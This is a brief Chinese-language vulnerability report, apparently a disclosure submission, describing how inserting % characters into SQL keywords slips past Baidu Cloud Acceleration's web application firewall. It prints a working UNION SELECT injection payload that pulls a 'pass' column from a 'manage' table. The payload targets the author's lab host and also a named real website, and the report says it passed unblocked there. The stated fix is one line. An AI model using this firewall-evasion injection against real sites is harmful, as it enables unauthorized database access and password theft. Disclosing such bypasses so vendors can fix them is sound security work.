http://www.im286.com/forum.php?id=1 and 1=1通过这个知道 该网站用了 百度云加速的waf。
但是百度waf由于没有对%号字符做处理 导致SQL注入被绕过。
这是我自己搭的环境。
htpp://192.168.1.100/test2.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage
顺利注射出password而这个站点
http://www.im286.com/1.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage
顺利通过没有拦截。
修复方案:
对%做处理